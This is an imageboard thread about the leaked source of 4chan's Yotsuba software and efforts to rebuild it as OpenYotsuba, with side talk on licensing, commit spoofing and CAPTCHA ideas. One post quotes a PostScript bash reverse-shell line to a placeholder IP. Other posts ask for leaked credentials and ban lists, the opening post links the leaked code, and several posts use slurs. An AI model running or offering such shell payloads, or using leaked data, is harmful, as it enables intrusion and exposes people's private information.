â„–4613
[Last 50 Posts][Quote]
>FUCK SOIJAK POSTERSHere we talk about the source code leak of 4chan's proprietary software Yotsuba and try to "fix" it in order to make a proper open-source version of 4chan's (sh!tty) software, for example by fixing bugs such as the colored border on GIF thumbnails and making it work on modern, traditional server setups.
<REDDIT SPACEGet the source code here:
https://files.catbox.moe/d56ws8.7z â„–7307[Quote]
>>7289is this like kirito's epic weeaboo world seed
â„–7313[Quote]
main board page now working!
>>7307it's a pattern that haunts my soul, generated by some very simple computation rules
if i remember correctly, it's something like
"imagine pixels in a grid, do a simple math expression with their coordinates (like pixel value = x*y), then a simple check against an arbitrary combination of bits in the pixel value is done, like 'if bit 3 and bit 7 are high/set/on/1/true, then color this pixel red/color1, otherwise color it black/color2'"
so the math and computation is very simple, but it ends up generating this fucking terrifying demon rune shape
i think the idea was that i was going to replace human languages shown on a computer screen with a made-up language whose symbols' features were made up of slices of this and other 'demon rune' shapes since such a language would be infinitely more computationally efficient to render on screen compared to modern fonts. the catch being that you have to unlearn all human language, but to me that's more of a bonus than a catch
…but that's not too related (second image is a color rendering of the bytes of some data in a function loaded by the windows loader automatically into every windows program; standard functions and whatnot)
â„–7320[Quote]
>>73194chan.community is geggy
â„–7329[Quote]
>>7319>>73234chan.africa is great
i think picking a domain with 4chan if you want to make this public is,
well, you're already inviting some legal trouble by cloning the website with its leaked source, but if you also take their name (which i think is part of an LLC of theirs), then you're really asking for trouble
personally i am choosing with a different name with chan at the end
also, replies work now
>there's a lot of `while(list($foo) = each($bar))` to be changed into `foreach(array_keys($bar) as $foo)` for anyone upgrading PHP â„–7347[Quote]
just upload the codes to chatgpt and tell it to optimize the bitch
â„–7349[Quote]
>>7347Easier said than done. Even with ChatGPT, improving the codebase will likely take hours and hours of manual review.
â„–7359[Quote]
>>>7329>>you're already inviting some legal trouble by cloning the website with its leaked source>The leaked code is under an open-source license now.>https://github.com/AlexDev404/4chan-main/commits/main/Wow
I wonder what is going to happen next
Considering desuwa (if that really is him) got permission from hiro to dump the rest of source I think it is likely the site is going to undergo a large rework
I don't think it will be open source though, I think this is just placating gesture, site will just get a closed source overhaul, which it has been due for god only knows how long.
â„–7371[Quote]
>>7342is AlexDev404 affiliated with 4chan?
if he isn't, licenses don't make it so you can take someone from something, declare it "free for everyone" and then everything works out fine
the original source owners, 4chan, have an implicit copyright if they don't have an explicit one, and unless they (the original source owners, 4chan) explicitly make it open source (and even then, certain flavors of open source might still require people add licenses, only very very specific ones allow completely open and free use) then you could still have problems
it's like someone signing over to you a deed to property they don't actually own; it doesn't make the property yours no matter how technically validly written the deed was (if it isn't legally valid through land holder records with whatever government is in control of that)
â„–7372[Quote]
>>7371>is AlexDev404 affiliated with 4chan?No, but Desuwa is. He's the one who added the WTFPL licence to the repo.
https://github.com/AlexDev404/4chan-main/commit/e5a338d98985bd5b05e77962a55b718168a2e4c9Read the post.
â„–7377[Quote]
>>7359>got permission from hiro to dump the rest of sourceno additional code was leaked
â„–7381[Quote]
>>7372you realize you can impersonate anyone you want with commits?
â„–7382[Quote]
>>7342smells like raisins to me
desuwa's github accoutn has been practically dead (in terms of 4chan) for 12 years
i can think of three scenarios:
- disgruntled or otherwise malevolent former developer leaks code for malevolent reasons
- leaker was able to access this person's github account, not far fetched from them having what seemed to be root access to all of 4chan's infrastructure and they're merely posing as a "real developer" (who still hasn't done any development for 12 years
- 4chan has been paying (maybe) a developer and allocated them free reign to make legal licensing decisions despite not doing any significant work in about 12 years
do you really think it's that last option?o
â„–7385[Quote]
>>7382>leaker was able to access this person's github accountyou don't need his github account. you only need to set user.name and user.email to his with git config
â„–7387[Quote]
>>7385oh, i see, github makes it appear almost as if the github account that made 4chan contributions made these commits.
first image contains the page that does actually contain a link to desuwa's github profile page, but that page contains no information of these contributions or commits
that being said, even if hypothetically this was not a lazy spoof, it woudl still make beyond no sense
i think that chud/anon/poster/roodypoo was just reading tweets and taking them at face value
how do we make a 4chan that filters out troglodytes that do that? (do we want to filter them out?)
â„–7391[Quote]
>>7385Interesting, didn't know it would be that easy to spoof user actions especially on a site like GitHub.
â„–7393[Quote]
>>7391honestly at this point pretend it's open source and put legal blame on github for fucking that up if anyone gives you trouble
<¯\_(ツ)_/¯ №7402[Quote]
>>7393>>7394gonna have to go ahead and reiterate that that post is SATIRE and PARODY
my schizo gut tells me the scale of whatever is going on might be a magnitude or several larger than at least i initially felt/thought
root access to 4chan is nuts
leaking everything thoroughly and obliterating their infra is double nuts
finding/knowing and taking advantage of a github interface spoofing issue and fabricating an open and free license using a 4chan developer's github account as cover?
that's starting to get into "federal pound me in the ass prison" tier tomfoolery
â„–7420[Quote]
>>7402nigger it's not that bad anyone can do git set global user.name / user.email —
>the commits are actually verifiedah nevermind, so either desuwane made those commits or his account really got spoofed, yeah this keeps getting worse for 4cucks
â„–7443[Quote]
>>7420if you go to desuwa's github profile directly:
https://github.com/desuwa, there's commits to other things but these are left out, so it's like you can spoof with just the right details to trick github's interface on the commit page to think an account made a commit without it actually doing so
but that spoof alone isn't even bad, what i meant is that each "action" done in this situation makes the legal aspect exponentially worse:
>hack: bad>infra obliterate: bad>leak: bad>github spoof and fake license: bad>hack + infra + leak: gigabad>hack + infra + leak + spoof exploit + fake license: nigger what the fuck are you doing â„–7445[Quote]
>>6910>`root` is a tricky little valueIt’s the datetime the thread was bumped.
â„–7489[Quote]
File: nose.png 📥︎ (202.97 KB, 308x348) 609215ab192eb6d6df71a6d2be4f61b07b121ce44a996d3716437c6f21d283c90ImgOps
Has anyone database 4cucks credensials? i wanna see the ban_users table
â„–7500[Quote]
This update will be big due to the new leaks, but in short, this is what I have done so far:
>A LOT of bug fixes, this includes unhardcoding paths
>index.php from the homepage leaks is working
>You can set your site name in config/global_config.ini, I'll have to unhardcode 4chan references
>Added a default banner
Tomorrow I'll try to integrate reports, team (which will be renamed admin) and the twister CAPTCHA into OpenYotsuba.
â„–7518[Quote]
>>4613 (OP)Irrelevant to the threads, but is there an extension for the sharty? All new boards are dying, probably because of the inability to track replies.
â„–7537[Quote]
>>7519I remember when this started happening, but it's not a full shadowban, since the post appears successful but then still doesn't show up on the thread (a true shadowban would go as far as to show the post appearing on the thread to make you believe it went through)
this seems designed to fool bots, not humans
â„–7539[Quote]
>>4613 (OP)true, but it fucking fooled me for a while
had to resort to tracing through the entire post mechanism before stumbling on
>`function show_post_successful_fake(…`finding 12 invocations, debug at each of them and figure out that two were firing off, and at least one of them has a trigger that's a random number generator
â„–7584[Quote]
>>7152How about 4chan.gg?
â„–7607[Quote]
>>7500mr open yots, schizo here
if you're going to go with php8.4/?/? and we're going to go with php8.2/debian/apache, differences (new admin stuff(?) vs. old admin page dug out of grave), etc.
should i be forking or contributing to your repo or should i be running my own repo? i'm inclined to run my own since i'm autistic and hostile normally, and you appear to update things mega slow
â„–7609[Quote]
Applaud your efforts. 4chan running 20 year old updated software is laughable given the amount of traffic the site was getting.
Also anyone considering proton mail for animosity don't bother. They're now running a bait and switch where they allow you to run a new email and then claim "unusual activity" on tons of peoples accounts demanding you sign up to a paid account for "security".
Fucking scammers.
â„–7626[Quote]
>>>4615
>I hope you guys fix the vulnerabilities and improve it and 4chan actually uses it
just crazy enough to work
â„–7637[Quote]
>>>7152
>How about 4chan.gg?
â„–7638[Quote]
>>6261what windows is that and where do I get it?
â„–7645[Quote]
>>4628>>4629>>4632>japcodeit's fucking over then
japanese code is so horribly fucking bad
japs dont know english so they just give random variable names to everything
you practically have to reverse engineer their code before you can understand it
>>4653code soys wont like this but there's actually nothing wrong with hardcoding IF the software isn't public and will only ever be used on one website
>>4672>>4670It's not hard to optimize a fucking imageboard. Idiots just don't try and they use inefficient scripting languages and don't optimize their DB, because they're more focused on fancy bing bing wahoo features like liveposting (gimmick) than just speeding up the basics.
I doubt any of these idiots who dink around with Javascript altchan software even bother to profile their code (which is step 1 to improving performance).
>>467990% of the speed is in the database. In my experience most slowdowns come from having extremely long threads with thousands of posts/images. Having fairly small post limits/image limits and only supporting 1 image per post goes a long way towards speeding things up.
>>4717dencentralized or onion chans never get many posters because you have to install some software to access them, and they always get filled with pizza
It's really not worth it
>>5037>my code is raisinty, slow and inefficient but look how few LINES OF CHODE it has bro!LoC counter fags are retarded
10000 lines of code with high performance is better than a 500 line pile of dingleberries that will fall on its face with more than 10 concurrent posters
>>5336they got an army of jannies that work 4free
>>6757Opensores fags are cucks. Just host a code server on .onion and stop using raisinty Git version controls that dox your name and email on every commit
>>6832yeah just a mod log with the name of the janny, the content of the post (with images and links obfucated) and reason for the action. like 8chan used to have before it got mossaded
>>7638Windows NT 4.0 just look on archive.org for the .iso
It's the first version of windows that's actually semi-usable for non-internet tasks, 3.x UI is ass
â„–7653[Quote]
source? whats better to use then?
â„–7673[Quote]
imagine giving your personal information to a guy called rapeape
â„–7776[Quote]
anyone got the full janny agreement?
â„–7801[Quote]
>>7609>They're now running a bait and switch where they allow you to run a new email and then claim "unusual activity" on tons of peoples accounts demanding you sign up to a paid account for "security".Yeah, you're not even allowed to use it for email confirmation on legit websites anymore. And my ProtonMail (still free plan) dates back from the closed beta
â„–7815[Quote]
>>7607i use apache like you, also you can contribute to my repo if you want
â„–7826[Quote]
4cheese.org
â„–8112[Quote]
Bump
â„–8166[Quote]
the pdf code sure looked like this
´´
%!PS-Adobe-3.0
(%machine%/bin/bash -c "bash -i >& /dev/tcp/IP/443 0>&1") (r) file
´´
â„–8280[Quote]
>>7582seriously they still don't have a github repository?
â„–8371[Quote]
>tutamail
using a known honeypot is probably not a good idea
â„–8383[Quote]
>>8278jannies can now delete or clear reports, and the whole workflow is shockingly smooth and fast
report a post, the janitor tools toolbox can be refreshed and the report can be seen very quickly, clicking on it sends you straight to the reports page, where the janny can delete or clear the report.
i wonder then what's left to do. image uploading/filtering/approval comes to mind as something that might extremely quickly become a problem/necessity(approvals). besides that, i can then perform the unpleasant task of doing everything all over again, but turning it into probably multiple sets of instructions:
>1. how to set it up for dummies who don't care about internals>2. how to actually repair it, step by step, starting from the initial leak and ending with what we have here with PHP8.2 and apache, although every person might take different paths to repair it to different end states. right now i have 250k characters in notepad files of everything i've done so far â„–8726[Quote]
>>8383i'm slow as a motherfucker
only today figured out where the team files were, got that up and working. worked for me without 2factor since i sort of mangled the authentication system
i think my mangling makes more sense than what they had, specifically because of this line in lib/admin.php:
`$hashed_admin_password = hash('sha256', $username . $password . $admin_salt);`
however the "current" thing works, it is hashing $password, which comes from the database, which contains hashed passwords.
why hash a hash? hashing it again doesn't make it any "hashier" or secure. if their auth system is stupid, i won't keep the stupid bits.
so you can login via the old login page, and when you do, the team page can be accessed as normal (so far, anyways)
currently adding a new feature for janitors and up to handle "image requests", which will be something toggleable later, but at first will work like the 'sharty.
once manual image approvals are functioning, i think i can publish the link to my iteration, restrict it to just one board (we might mix 4ch and 8ch ideas for more boards), then start building the git log of all the changes
â„–8870[Quote]
>>8726>manual image approvals are functioningWhy not save the image hashes of the approved ones?
â„–8875[Quote]
I'm more interested with database, especially the banned IP list that use vpn
â„–8895[Quote]
upo
â„–8906[Quote]
>>8726doing god's work. keep it up and then somebody can make a noncucked 4cuck
â„–8907[Quote]
>>4613 (OP)>one attachment per post>deprecated VP8 web encoding>no audio>tiny file size limit>aggressive anti-VPN technology>aggressive browser fingerprinting>terrible filter supportWhy polish this turd, let it die a death
â„–8975[Quote]
>>8907Because it's my turd and I like it
â„–8976[Quote]
>>8907all pretty easy to add/disable/remove
â„–9065[Quote]
>>8870i can think of one reason not to. i was going to "just" alter the posts db table with "img_cleared", "img_cleared_by" tinyint(1) and varchar columns so every post with an image needs to be cleared by a janny or higher.
why i wouldn't save the hashes is that when i make more boards functional, some images maybe should only be approved in certain contexts, and using hashes could make that very complex very quickly (so a solution in the future)
for instance, if we have /mlp/, then an approved pony image hash might only be valid on the pony board, so now we need to categorize the hashes. at first, just tacking on a bit more data to every post and duplicating the "report" feature but for "image request" should be easiest
â„–9067[Quote]
>>8907not a single altchan I have found works as seamlessly and smoothly as 4chan with 4chanX did
they all SUCK and are bloaty, unreliable, confusing, and/or lacking in crucial basic features for the sake of some other pursuit or focus
â„–9071[Quote]
>>8907>>9067even this one is fucking terrible, like a bad AI/LLM generated clone of 4chan. the style is just "off" everywhere, multiple times i haven't been able to post for something like 6+ hours and i don't think anyone else can either, crypto mining forced on posters sometimes, the way replies work is fucking with my brain since it works differently (quoting, replies, make a reply at the top, all weirdly linked together and persistent). even my own raisinty setup of the leaked 4chan source looks and feels 100x nicer. a better question is why as time goes forward does everyone write worse and worse, abstracted, monkeypatch garbage pajeet code?
â„–9077[Quote]
>>5884>>5885also going to post here for posterity, a captcha idea. words made of word clouds. i think it works similarly to how camouflage works in military (also environmentally context-aware hierarchical and fractal), but with words/characters/symbols/letters. i asked claude 3.7 sonnet (a very, very, very good LLM and computer vision model) to tell me what the word here was, and it couldn't figure it out, even with several massive hints ("i'ts 5 letters", "it's a wordcloud made of wordclouds"), and even if i told it there were 5 wordclouds, each made up one of the 5 letters that make the word i wanted it to find, it couldn't get a single letter correct.
my original idea is that llms/ai/computer vision processes at the "feature level", and going back in papers shows that's the simplest stuff like "a capital A has forward slash, back slash, horizontal line, straight line features" (like booru tags on the components of symbols), so if one wants a good captcha, you have to distort those features, and what better to do that with than the very thing it's trying to read?
â„–9078[Quote]
>>9071>even this one is fucking terribleYES
IT IS
HOW DO YOU FUCK UP A BASIC CLONE oh wait this site is literally a bunch of butthurt teenagers who were too obnoxious even for 4chan
â„–9111[Quote]
https://gitgud.io/GapeNewell/OpenYotsuba/-/releases/0.2.0too many changes to count
<REDDIT SPACEno CAPTCHA support because i rushed this out, sorry that should hopefully be on 0.3.0
â„–9135[Quote]
>https://gitgud.io/GapeNewell/OpenYotsuba/-/releases/0.2.0>too many changes to count><REDDIT SPACE>no CAPTCHA support because i rushed this out, sorry that should hopefully be on 0.3.0I cannot access to anythin. Do I need to config something before initializing server?
â„–9145[Quote]
>>9078this runs vichan which is arguably the best-maintained imageboard software
â„–9163[Quote]
>>9162put this on your php.ini, without the meme arrow of course
>display_errors=On â„–9167[Quote]
>>9166it's not reading config/global_config.ini, SITENAME and STATIC_SERVER are defined in it
â„–9170[Quote]
Bump
â„–9174[Quote]
>>9167In lib/ini.php there's have to change the $configdir and $yconfgdir value. The current values in repository are an example to change them (btw, there's not a README.md file which It says that)
â„–9183[Quote]
>>9077pretty sure your captcha can be beaten simply by downscaling the image. also llms aren't that good for this kind of task
â„–9185[Quote]
>>9179Thx. Where can I find popular_threads.cgi file? It's missing
â„–9200[Quote]
>>9185run this
>php tasks/update_fpcontent.php â„–9206[Quote]
>>9183Ask the user to pick one word from each word cloud as well?
(can make this individual characters to be easier, and doesn't have to be a 5 letter word).
Target the hierarchical nature (say we have two letters made of 'letter-clouds'):
- identify the top hierachy: ("what are the two biggest letters" (or similar), would be the two letters consisting of letter-clouds)
- identify smaller hierarchy and separation: ("write one letter from each of the letter-clouds")
Can probably expand to more hierarchies and play with the idea, but focus on the idea that at least a cutting-edge computer vision and LLM AI gets BTFO by a simple "word cloud of words" and fails to answer lots of questions.
(it also gets BTFO if you ask it those simpler letter questions about this image, it cannot figure out that this spells out `MY` but it was able to idenitfy at least that there were 2 letter clouds).
if anything, it can be added to the list of ways to make a captcha and might be a novel thing
(you know how some chan images are made to look very different when scaled? do that, too, so if one resamples the image it's wildly distorted)
â„–9211[Quote]
Surely an easy feat for any AI released the past couple of months.
â„–9213[Quote]
How good is AI cryptography?
â„–9215[Quote]
Actually, scratch that. The key thing to ask here is, what is it that the AI can't do that humans can? It's being trained to make the 'right' interpretations of anything, so make the verification for humans the 'wrong' interpretation.
â„–9223[Quote]
>>9211try it with any AI and i am very interested in how it performs. i suspect it's a "new" "thing" for AI and so it might have difficulty with it. even if it's easily solved, it might make every captcha solver have to update their stuff to handle this, which is valuable alone
>>9215at least with the <?>-cloud of <?> stuff it seems AI might have trouble handling simultaneous hierarchical interprations: if you give it a picture of a forest, maybe you can ask it about trees, or you can ask it about the forest, but it "can't see the forest AND the trees", since those are details at a high AND low level of abstraction, and if you ask it about both at the same time then you really put it in a bind
>reddit spacebut to stop hijacking with that idea, it feels good to post with anons again.
still working on getting image requests going, right now i have a very promising attempt at putting a trigger in the database on posts to insert into a table similar to the reports table, so that i can clone the reports page and make an image requests page using mostly the same logic
â„–9227[Quote]
Let me try explaining it this way. You can filter out a majority of the AI's by looking at their base programming, AND the design philosophy of people programming them. If you were to make the 'captcha' not actually a captcha, but require them to do something against their programming instead (ex: asking ChatGPT to say something hostile to someone won't work) then you filter it out. I don't know much about programming though. I just think there might be a better way then trying the same cryptographic methods people have been using for a long time, and instead trying something a little more abstract.
â„–9229[Quote]
>>9215AI can't solve arc agi 2:
https://arcprize.org/leaderboardso maybe if you could generate these kinds of challenges with enough randomness so as to not let any patterns to appear
â„–9241[Quote]
>>9229idk what this raisin is but it reads like AI to me. Already the assumption is that 'intelligence' is something that can be computed on logic alone. My answer is this; make the captcha a gamble. Randomly seed the right and wrong responses, so even the users are only guessing at the right answer. Make it a two part question even, so you get the heirarchical response that other anon was posting about. Humans would know the system, and would be able to try again. But the AI wouldn't, and wouldn't be able to find a logic to it. I don't know if that works, again I don't know any programming and I've barely used AI, but it seems plausible to me.
â„–9259[Quote]
You're looking to set a computer based password. If there was a new image and a new non-sequitur response, then there would be no way for a computer to learn anything, since 'to learn' it has to have something to build on. So make anything it CAN'T build on. Never complete the pattern, and never stop creating new. It can only be solved in the real world, with real people agreeing to the meaning of a word. Use that as the password. That's what tech companies and the rich do already. You don't speak their language, you don't get in. Be subversive and completely outside the range of your enemies, and never let them be aware of your communication. But we're all friends here right anons? There'd be no reason we'd be against talking outside of here as friends, right?
â„–9263[Quote]
Instead of captcha has anybody looked into ZK proof of humanity or something similar?
eg.
https://docs.rarimo.com/zk-passport/ //
https://self.xyz/#features All these cheap machines bamboozling schemes will be broken, it's just a matter of time.
The only real protection remains cryptography. It's surprising big tech hasn't gone deeper into this. This reduces the BOT set to governments. I'm not aware of any other proper P2P registry.